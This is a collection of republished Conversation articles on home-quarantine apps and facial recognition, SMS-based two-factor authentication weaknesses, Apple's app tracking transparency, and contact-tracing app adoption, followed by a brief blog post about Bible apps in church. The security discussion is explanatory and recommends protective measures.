I’d prefer an ankle tag: why home quarantine apps are a bad idea


Shutterstock

Toby Walsh, UNSWSouth Australia has begun a trial of a new COVID app to monitor arrivals into the state. SA Premier Steven Marshall claimed “every South Australian should feel pretty proud that we are the national pilot for the home-based quarantine app”.

He then doubled down with the boast that he was “pretty sure the technology that we have developed within the South Australia government will become the national standard and will be rolled out across the country.”

Victoria too has announced impending “technologically supported” home quarantine, though details remain unclear. Home quarantine will also eventually be available for international arrivals, according to Prime Minister Scott Morrison.

The South Australian app has received little attention in Australia, but in the US the left-leaning Atlantic magazine called it “as Orwellian as any in the free world”. Right-wing outlets such as Fox News and Breitbart also joined the attack, and for once I find myself in agreement with them.

Location tracking and facial recognition

The South Australian home quarantine app uses facial recognition software to identify users.
Government of South Australia

Despite the SA Premier’s claims, this isn’t the first such app to be used in Australia. A similar home-quarantine app is already in use for arrivals into WA, and in some cases the Northern Territory.

Both apps uses geolocation and facial recognition software to track and identify those in quarantine. Users are required to prove they are at home when randomly prompted by the application.

In SA, you have 15 minutes to get the face recognition software to verify you’re still at home. In WA, it is more of a race. You have just 5 minutes before you risk a knock on the door from the police.

Another difference is that the SA app is opt-in. Currently. The WA app is already mandatory for arrivals from high risk areas like Victoria. For extreme risk areas like NSW, it’s straight into a quarantine hotel.

Reasons for concern

But why are we developing such home-quarantine apps in the first place, when we already have a cheap technology to do this? If we want to monitor that people are at home (and that’s a big if), wouldn’t one of the ankle tags already used by our corrective services for home detention be much simpler, safer and more robust?

There are many reasons to be concerned about home-quarantine apps.

First, they’ll likely be much easier to hack than ankle tags. How many of us have hacked geo-blocks to access Netflix in the US, or to watch other digital content from another country? Faking GPS location on a smartphone is not much more difficult.

Second, facial recognition software is often flawed, and is frequently biased against people of colour and against women. The documentary Coded Bias does a great job unpicking these biases.

The documentary Coded Bias explains the common inbuilt flaws of facial recognition software.

Despite years of effort, even the big tech giants like Google and Amazon have been unable to eliminate these biases from their software. I have little hope the SA government or the WA company GenVis, the developers of the two Australian home-quarantine apps, will have done better.

Indeed, the Australian Human Rights Commission has called for a moratorium on the use of facial recognition software in high-risk settings such as policing until better regulation is in place to protect human rights and privacy.

Third, there needs to be a much more detailed and public debate around issues like privacy, and safeguards put in place based on this discussion, in advance of the technology being used.

With COVID check-in apps, we were promised the data would only be used for public health purposes. But police forces around Australia have accessed this information for other ends on at least six occasions. This severely undermines the public’s confidence and use of such apps.




Read more:
Police access to COVID check-in data is an affront to our privacy. We need stronger and more consistent rules in place


Before it was launched, the Commonwealth’s COVIDSafe app had legislative prohibitions put in place on the use of the data collected for anything but contact tracing. This perhaps gave us a false sense of security as the state-produced COVID check-in apps did not have any such legal safeguards. Only some states have retrospectively introduced legislation to provide such protections.

Fourth, we have to worry about how software like this legitimises technologies like facial recognition that ultimately erode fundamental rights such as the right to privacy.

If home-quarantine apps work successfully, will they open the door to facial recognition being used in other settings? To identify shop lifters? To provide access to welfare? Or to healthcare? What Orwellian world will this take us to?

The perils of facial recognition

In China, we have already seen facial recognition software used to monitor and persecute the Uighur minority. In the US, at least three Black people have already wrongly ended up in jail due to facial recognition errors.

Facial recognition is a technology that is dangerous if it doesn’t work (as it often the case). And dangerous if it does. It changes the speed, scale and cost of surveillance.

With facial recognition software behind the CCTV cameras found on many street corners, you can be tracked 24/7. You are no longer anonymous when you go out to the shops. Or when you protest about Black lives mattering or the climate emergency.

High technology is not the solution

High tech software like facial recognition isn’t a fix for the problems that have plagued Australia’s response to the pandemic. It can’t remedy the failure to buy enough vaccines, the failure to build dedicated quarantine facilities, or the in-fighting and point-scoring between states and with the Commonwealth.

I never thought I’d say this but, all in all, I think I’d prefer an ankle tag. And if the image of the ankle tag seems too unsettling for you, we could do what Hong Kong has done and make it a wristband.The Conversation

Toby Walsh, Professor of AI at UNSW, Research Group Leader, UNSW

This article is republished from The Conversation under a Creative Commons license. Read the original article.

How hackers can use message mirroring apps to see all your SMS texts — and bypass 2FA security


Shutterstock

Syed Wajid Ali Shah, Deakin University; Jongkil Jay Jeong, Deakin University, and Robin Doss, Deakin UniversityIt’s now well known that usernames and passwords aren’t enough to securely access online services. A recent study highlighted more than 80% of all hacking-related breaches happen due to compromised and weak credentials, with three billion username/password combinations stolen in 2016 alone.

As such, the implementation of two-factor authentication (2FA) has become a necessity. Generally, 2FA aims to provide an additional layer of security to the relatively vulnerable username/password system.

It works too. Figures suggest users who enabled 2FA ended up blocking about 99.9% of automated attacks.

But as with any good cybersecurity solution, attackers can quickly come up with ways to circumvent it. They can bypass 2FA through the one-time codes sent as an SMS to a user’s smartphone.

Yet many critical online services in Australia still use SMS-based one-time codes, including myGov and the Big 4 banks: ANZ, Commonwealth Bank, NAB and Westpac.




Read more:
A computer can guess more than 100,000,000,000 passwords per second. Still think yours is secure?


So what’s the problem with SMS?

Major vendors such as Microsoft have urged users to abandon 2FA solutions that leverage SMS and voice calls. This is because SMS is renowned for having infamously poor security, leaving it open to a host of different attacks.

For example, SIM swapping has been demonstrated as a way to circumvent 2FA. SIM swapping involves an attacker convincing a victims’s mobile service provider they themselves are the victim, and then requesting the victim’s phone number be switched to a device of their choice.

SMS-based one-time codes are also shown to be compromised through readily available tools such as Modlishka by leveraging a technique called reverse proxy. This facilitates communication between the victim and a service being impersonated.

So in the case of Modlishka, it will intercept communication between a genuine service and a victim and will track and record the victims’s interactions with the service, including any login credentials they may use).

In addition to these existing vulnerabilities, our team have found additional vulnerabilities in SMS-based 2FA. One particular attack exploits a feature provided on the Google Play Store to automatically install apps from the web to your android device.

Due to syncing services, if a hacker manages to compromise your Google login credentials on their own device, they can then install a message mirroring app directly onto your smartphone.
Shutterstock

If an attacker has access to your credentials and manages to log into your Google Play account on a laptop (although you will receive a prompt), they can then install any app they’d like automatically onto your smartphone.

The attack on Android

Our experiments revealed a malicious actor can remotely access a user’s SMS-based 2FA with little effort, through the use of a popular app (name and type withheld for security reasons) designed to synchronise user’s notifications across different devices.

Specifically, attackers can leverage a compromised email/password combination connected to a Google account (such as username@gmail.com) to nefariously install a readily-available message mirroring app on a victim’s smartphone via Google Play.

This is a realistic scenario since it’s common for users to use the same credentials across a variety of services. Using a password manager is an effective way to make your first line of authentication — your username/password login — more secure.

Once the app is installed, the attacker can apply simple social engineering techniques to convince the user to enable the permissions required for the app to function properly.

For example, they may pretend to be calling from a legitimate service provider to persuade the user to enable the permissions. After this they can remotely receive all communications sent to the victim’s phone, including one-time codes used for 2FA.

Although multiple conditions must be fulfilled for the aforementioned attack to work, it still demonstrates the fragile nature of SMS-based 2FA methods.

More importantly, this attack doesn’t need high-end technical capabilities. It simply requires insight into how these specific apps work and how to intelligently use them (along with social engineering) to target a victim.

The threat is even more real when the attacker is a trusted individual (e.g., a family member) with access to the victim’s smartphone.

What’s the alternative?

To remain protected online, you should check whether your initial line of defence is secure. First check your password to see if it’s compromised. There are a number of security programs that will let you do this. And make sure you’re using a well-crafted password.

We also recommend you limit the use of SMS as a 2FA method if you can. You can instead use app-based one-time codes, such as through Google Authenticator. In this case the code is generated within the Google Authenticator app on your device itself, rather than being sent to you.

However, this approach can also be compromised by hackers using some sophisticated malware. A better alternative would be to use dedicated hardware devices such as YubiKey.

Hand holds up a YubiKey USB with the text 'Citrix' in the background.
The YubiKey, first developed in 2008, is an authentication device designed to support one-time password and 2FA protocols without having to rely on SMS-based 2FA.
Shutterstock

These are small USB (or near-field communication-enabled) devices that provide a streamlined way to enable 2FA across different services.

Such physical devices need to be plugged into or brought into close proximity of a login device as a part of 2FA, therefore mitigating the risks associated with visible one-time codes, such as codes sent by SMS.

It must be stressed an underlying condition to any 2FA alternative is the user themselves must have some level of active participation and responsibility.

At the same time, further work must be carried out by service providers, developers and researchers to develop more accessible and secure authentication methods.

Essentially, these methods need to go beyond 2FA and towards a multi-factor authentication environment, where multiple methods of authentication are simultaneously deployed and combined as needed.




Read more:
Can I still be hacked with 2FA enabled?


The Conversation


Syed Wajid Ali Shah, Research Fellow, Centre for Cyber Security Research and Innovation, Deakin University; Jongkil Jay Jeong, CyberCRC Research Fellow, Centre for Cyber Security Research and Innovation (CSRI), Deakin University, and Robin Doss, Research Director, Centre for Cyber Security Research and Innovation, Deakin University

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Apple’s new ‘app tracking transparency’ has angered Facebook. How does it work, what’s all the fuss about, and should you use it?


Amr Alfiky/AP

Paul Haskell-Dowland, Edith Cowan University and Nikolai Hampton, Edith Cowan UniversityApple users across the globe are adopting the latest operating system update, called iOS 14.5, featuring the now-obligatory new batch of emojis.

But there’s another change that’s arguably less fun but much more significant for many users: the introduction of “app tracking transparency”.

This feature promises to usher in a new era of user-oriented privacy, and not everyone is happy — most notably Facebook, which relies on tracking web users’ browsing habits to sell targeted advertising. Some commentators have described it as the beginnings of a new privacy feud between the two tech behemoths.

So, what is app tracking transparency?

App tracking transparency is a continuation of Apple’s push to be recognised as the platform of privacy. The new feature allows apps to display a pop-up notification that explains what data the app wants to collect, and what it proposes to do with it.

Privacy | App Tracking Transparency | Apple.

There is nothing users need to do to gain access to the new feature, other than install the latest iOS update, which happens automatically on most devices. Once upgraded, apps that use tracking functions will display a request to opt in or out of this functionality.

iPhone screenshot showing new App Tracking Transparency functionality
A new App Tracking Transparency feature across iOS, iPadOS, and tvOS will require apps to get the user’s permission before tracking their data across apps or websites owned by other companies.
Apple newsroom

How does it work?

As Apple has explained, the app tracking transparency feature is a new “application programming interface”, or API — a suite of programming commands used by developers to interact with the operating system.

The API gives software developers a few pre-canned functions that allow them to do things like “request tracking authorisation” or use the tracking manager to “check the authorisation status” of individual apps.

In more straightforward terms, this gives app developers a uniform way of requesting these tracking permissions from the device user. It also means the operating system has a centralised location for storing and checking what permissions have been granted to which apps.

What is missing from the fine print is that there is no physical mechanism to prevent the tracking of a user. The app tracking transparency framework is merely a pop-up box.

It is also interesting to note the specific wording of the pop-up: “ask app not to track”. If the application is using legitimate “device advertising identifiers”, answering no will result in this identifier being set to zero. This will reduce the tracking capabilities of apps that honour Apple’s tracking policies.

However, if an app is really determined to track you, there are many techniques that could allow them to make surreptitious user-specific identifiers, which may be difficult for Apple to detect or prevent.

For example, while an app might not use Apple’s “device advertising identifier”, it would be easy for the app to generate a little bit of “random data”. This data could then be passed between sites under the guise of normal operations such as retrieving an image with the data embedded in the filename. While this would contravene Apple’s developer rules, detecting this type of secret data could be very difficult.




Read more:
Your smartphone apps are tracking your every move – 4 essential reads


Apple seems prepared to crack down hard on developers who don’t play by the rules. The most recent additions to Apple’s App Store guidelines explicitly tells developers:

You must receive explicit permission from users via the App Tracking Transparency APIs to track their activity.

It’s unlikely major app developers will want to fall foul of this policy — a ban from the App Store would be costly. But it’s hard to imagine Apple sanctioning a really big player like Facebook or TikTok without some serious behind-the-scenes negotiation.

Why is Facebook objecting?

Facebook is fuelled by web users’ data. Inevitably, anything that gets in the way of its gargantuan revenue-generating network is seen as a threat. In 2020, Facebook’s revenue from advertising exceeded US$84 billion – a 21% rise on 2019.

The issues are deep-rooted and reflect the two tech giants’ very different business models. Apple’s business model is the sale of laptops, computers, phones and watches – with a significant proportion of its income derived from the vast ecosystem of apps and in-app purchases used on these devices. Apple’s app revenue was reported at US$64 billion in 2020.

With a vested interest in ensuring its customers are loyal and happy with its devices, Apple is well positioned to deliver privacy without harming profits.

Should I use it?

Ultimately, it is a choice for the consumer. Many apps and services are offered ostensibly for free to users. App developers often cover their costs through subscription models, in-app purchases or in-app advertising. If enough users decide to embrace privacy controls, developers will either change their funding model (perhaps moving to paid apps) or attempt to find other ways to track users to maintain advertising-derived revenue.

If you don’t want your data to be collected (and potentially sold to unnamed third parties), this feature offers one way to restrict the amount of your data that is trafficked in this way.

But it’s also important to note that tracking of users and devices is a valuable tool for advertising optimisation by building a comprehensive picture of each individual. This increases the relevance of each advert while also reducing advertising costs (by only targeting users who are likely to be interested). Users also arguably benefit, as they see more (relevant) adverts that are contextualised for their interests.

It may slow down the rate at which we receive personalised ads in apps and websites, but this change won’t be an end to intrusive digital advertising. In essence, this is the price we pay for “free” access to these services.




Read more:
Facebook data breach: what happened and why it’s hard to know if your data was leaked


The Conversation


Paul Haskell-Dowland, Associate Dean (Computing and Security), Edith Cowan University and Nikolai Hampton, School of Science, Edith Cowan University

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Not just complacency: why people are reluctant to use COVID-19 contact-tracing apps



Mark Coote/Bloomberg via Getty Images

Farkhondeh Hassandoust, Auckland University of Technology

This week’s announcement of two new COVID-19 vaccine pre-purchase deals is encouraging, but doesn’t mean New Zealanders should become complacent about using the NZ COVID Tracer app during the summer holidays.

The immunisation rollout won’t start until the second quarter of 2021, and the government is encouraging New Zealanders to continue using the app, including the recently upgraded bluetooth function, as part of its plan to manage the pandemic during the holiday period.




Read more:
How to keep COVID-19 at bay during the summer holidays — and help make travel bubbles a reality in 2021


During the past weeks, the number of daily scans has dropped significantly, down from just over 900,000 scans per day at the end of November to fewer than 400,000 in mid-December.

With no active cases of COVID-19 in the commmunity, complacency might be part of the issue in New Zealand, but as our research in the US shows, worries about privacy and trust continue to make people reluctant to use contact-tracing apps.

Concerns about privacy and surveillance

We surveyed 853 people from every state in the US to identify the factors promoting or inhibiting their use of contact-tracing applications. Our survey reveals two seemingly contradictory findings.

Individuals are highly motivated to use contact-tracing apps, for the sake of their own health and that of society as a whole. But the study also found people are concerned about privacy, social disapproval and surveillance.

The findings suggest people’s trust in the data collectors is dependent on the technology features of these apps (for example, information sensitivity and anonymity) and the privacy protection initiatives instigated by the authorities.

With the holiday season just around the corner — and even though New Zealand is currently free of community transmission — our findings are pertinent. New Zealanders will travel more during the summer period, and it is more important than ever to use contact-tracing apps to improve our chances of getting on top of any potential outbreaks as quickly as possible.

How, then, to overcome concerns about privacy and trust and make sure New Zealanders use the upgraded app during summer?

The benefits of adopting contact-tracing apps are mainly in shared public health, and it is important these societal health benefits are emphasised. In order to quell concerns, data collectors (government and businesses) must also offer assurance that people’s real identity will be concealed.

It is the responsibility of the government and the office of the Privacy Commissioner to ensure all personal information is managed appropriately.




Read more:
An Australia–NZ travel bubble needs a unified COVID contact-tracing app. We’re not there


Transparency and data security

Our study also found that factors such as peer and social influence, regulatory pressures and previous experiences with privacy loss underlie people’s readiness to adopt contact-tracing apps.

The findings reveal that people expect regulatory protection if they are to use contact-tracing apps. This confirms the need for laws and regulations with strict penalties for those who collect, use, disclose or decrypt collected data for any purpose other than contact tracing.

The New Zealand government is working with third-party developers to complete the integration of other apps by the end of December to enable the exchange of digital contact-tracing information from different apps and technologies.

The Privacy Commissioner has already endorsed the bluetooth upgrade of the official NZ COVID Tracer app because of its focus on users’ privacy. And the Ministry of Health aims to release the source code for the app so New Zealanders can see how their personal data has been managed.

Throughout the summer, the government and ministry should emphasise the importance of using the contact-tracing app and assure New Zealanders about the security and privacy of their personal data.

Adoption of contact-tracing apps is no silver bullet in the battle against COVID-19, but it is a crucial element in New Zealand’s collective public health response to the global pandemic.The Conversation

Farkhondeh Hassandoust, Lecturer, Auckland University of Technology

This article is republished from The Conversation under a Creative Commons license. Read the original article.

Bible Apps in the Pew


The link below is to an article that reports on the increasing use of tablets, smartphones and other gadgets in the pew during church services as modern technology impacts at the local level.

Do you use a digital version of the Bible during church services? If so, what do you use? Please share in the comments.

For more visit:
http://bits.blogs.nytimes.com/2013/07/27/the-bible-gets-an-upgrade/